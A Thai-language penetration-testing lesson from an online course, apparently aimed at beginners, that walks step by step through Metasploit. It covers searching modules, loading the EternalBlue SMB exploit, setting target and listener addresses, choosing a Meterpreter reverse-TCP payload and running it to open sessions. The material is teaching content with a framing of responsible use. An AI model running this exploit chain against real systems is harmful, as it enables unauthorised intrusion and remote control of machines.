0Pricing
Ethical Hacking Academy · บทเรียน

การค้นหาและใช้ช่องโหว่

ค้นหาและเรียกใช้

การค้นหาและใช้ช่องโหว่ เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

จากการสำรวจระบบสู่การใช้ประโยชน์จากช่องโหว่

หลังจากสแกนแล้ว คุณจะทราบบริการและรุ่นของระบบเป้าหมาย ขั้นตอนถัดไปคือการค้นหาโมดูล exploit ที่ตรงกับช่องโหว่ที่ทราบในรุ่นเหล่านั้น

คำสั่ง search ของ Metasploit คือประตูสู่โมดูลนับพันรายการ การค้นหาอย่างแม่นยำช่วยประหยัดเวลาและป้องกันการเรียกใช้โค้ดผิดรายการ

การค้นหาพื้นฐาน

คำสั่ง search จะค้นดัชนีโมดูลด้วยคำสำคัญ คุณสามารถค้นหาตามชื่อซอฟต์แวร์, CVE หรือบริการได้

search eternalblue
search type:exploit platform:windows smb

ตัวกรองการค้นหา

ปรับผลลัพธ์ให้แคบลงด้วยตัวกรอง:

  • type: exploit, auxiliary, post
  • platform: windows, linux, unix
  • cve: ตัวระบุ CVE รายการใดรายการหนึ่ง
  • rank: excellent, great, good (ความน่าเชื่อถือ)

การรวมตัวกรองเข้าด้วยกันช่วยลดผลลัพธ์จากโมดูลนับพันให้เหลือเพียงไม่กี่รายการได้อย่างรวดเร็ว

search cve:2017-0144 type:exploit

การอ่านผลลัพธ์การค้นหา

ผลการค้นหาจะแสดงโมดูลแต่ละรายการพร้อมระดับ วันที่เปิดเผย และตัวบ่งชี้การตรวจสอบ ระดับจะสะท้อนความน่าเชื่อถือและความปลอดภัยของ exploit

  • excellent: มีโอกาสน้อยที่จะทำให้เป้าหมายหยุดทำงาน
  • great/good: เชื่อถือได้ภายใต้เงื่อนไขทั่วไป
  • low/manual: มีความเสี่ยงหรือต้องตั้งค่าอย่างระมัดระวัง

ควรเลือกโมดูลที่มีระดับสูงกว่า เพื่อหลีกเลี่ยงการทำให้ระบบที่ใช้งานจริงหยุดทำงาน

การโหลดโมดูล

ใช้หมายเลขดัชนีของโมดูลหรือเส้นทางแบบเต็มร่วมกับ use พรอมต์จะเปลี่ยนไปแสดงโมดูลที่โหลดแล้ว และคลังข้อมูลจะเก็บตัวเลือกของโมดูลนั้นไว้

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

การตรวจสอบโมดูล

ก่อนเรียกใช้งาน โปรดอ่านข้อมูลเกี่ยวกับโมดูลก่อน info จะแสดงคำอธิบาย แหล่งอ้างอิง (CVE และคำแนะนำด้านความปลอดภัย) ตัวเลือกที่จำเป็น และเป้าหมายที่รองรับ

การเข้าใจว่าโมดูลทำงานอย่างไรเป็นส่วนหนึ่งของการใช้งานอย่างมืออาชีพและมีความรับผิดชอบ โปรดอย่าเรียกใช้ช่องโหว่ที่คุณไม่เข้าใจโดยเด็ดขาด

info
show options
show targets

การตั้งค่าตัวเลือก

กำหนดค่าตัวเลือกที่จำเป็นด้วย set ตัวเลือกที่ใช้บ่อยสำหรับช่องโหว่โจมตีจากระยะไกล ได้แก่ ที่อยู่เป้าหมายและการตั้งค่าเพย์โหลดของคุณ

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

คำสั่ง check

ช่องโหว่โจมตีจำนวนมากรองรับ check ซึ่งจะทดสอบอย่างปลอดภัยว่าเป้าหมายดูเหมือนมีช่องโหว่หรือไม่ โดยไม่ ใช้ช่องโหว่โจมตีจริง

การเรียกใช้ check ก่อนเป็นแนวทางปฏิบัติที่ดี เพราะช่วยลดความเสี่ยงที่ระบบจะหยุดทำงาน และยืนยันว่าคุณกำลังจะทุ่มเทความพยายามให้กับโอกาสที่มีอยู่จริง

check
# [+] 10.10.10.40:445 - The target is vulnerable.

การเลือกเพย์โหลด

ช่องโหว่โจมตีจำเป็นต้องมีเพย์โหลด Metasploit จะเลือกค่าเริ่มต้นให้ แต่คุณสามารถแสดงรายการและเลือกเพย์โหลดที่เหมาะกับเป้าหมายและระดับการเข้าถึงที่ต้องการได้

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

การเรียกใช้และเซสชัน

เริ่มการทำงานด้วย exploit (หรือ run) หากสำเร็จ คุณจะได้รับ เซสชัน ซึ่งเป็นการเชื่อมต่อแบบโต้ตอบกับเป้าหมาย

จัดการเซสชันหลายรายการด้วย sessions -l เพื่อแสดงรายการ และ sessions -i N เพื่อโต้ตอบกับเซสชันนั้น ใช้ background เพื่อพักเซสชันไว้เบื้องหลังและทำงานต่อในคอนโซล

exploit
sessions -l
sessions -i 1

ตัวเลือกส่วนกลางเทียบกับตัวเลือกของโมดูล

การตั้งค่าบางอย่าง เช่น LHOST จะนำกลับมาใช้ซ้ำในหลายโมดูลได้ ให้ตั้งค่าแบบส่วนกลางด้วย setg เพื่อไม่ต้องพิมพ์ซ้ำทุกครั้งที่เปลี่ยนโมดูล

  • set: ใช้กับโมดูลปัจจุบันเท่านั้น
  • setg: ใช้กับทุกโมดูลแบบส่วนกลาง
  • unsetg: ล้างค่าส่วนกลาง

วิธีนี้ช่วยประหยัดเวลาเมื่อทำงานระยะยาวที่มีหลายโมดูล

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

ตรวจสอบอย่างรวดเร็ว

เลือกขั้นตอนที่มีความรับผิดชอบก่อนเรียกใช้ช่องโหว่โจมตี

สรุปทบทวน

คุณได้เรียนรู้วิธีค้นหาและเรียกใช้ช่องโหว่โจมตีแล้ว:

  • ใช้ search พร้อมตัวกรอง (ประเภท แพลตฟอร์ม cve ระดับ) เพื่อค้นหาโมดูล
  • เลือกโมดูลที่มี rank สูงกว่าเพื่อความน่าเชื่อถือและความปลอดภัย
  • ใช้ use เพื่อโหลด ใช้ info/show options เพื่อตรวจสอบ และใช้ set เพื่อกำหนดค่า
  • เรียกใช้ check ก่อน จากนั้นใช้ exploit เพื่อสร้าง เซสชัน
  • จัดการเซสชันด้วย sessions -l/-i

ถัดไป: เพย์โหลดและเชลล์หลังการโจมตี Meterpreter

คำถามที่พบบ่อย

บทเรียน “การค้นหาและใช้ช่องโหว่” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “การค้นหาและใช้ช่องโหว่” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “การค้นหาและใช้ช่องโหว่”

ค้นหาและเรียกใช้ คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน

บทเรียน “การค้นหาและใช้ช่องโหว่” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม

ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สถาปัตยกรรม Metasploit
  2. การค้นหาและใช้ช่องโหว่
  3. เพย์โหลดและ Meterpreter
  4. มอดูลหลังการโจมตี
← กลับไปที่ Ethical Hacking Academy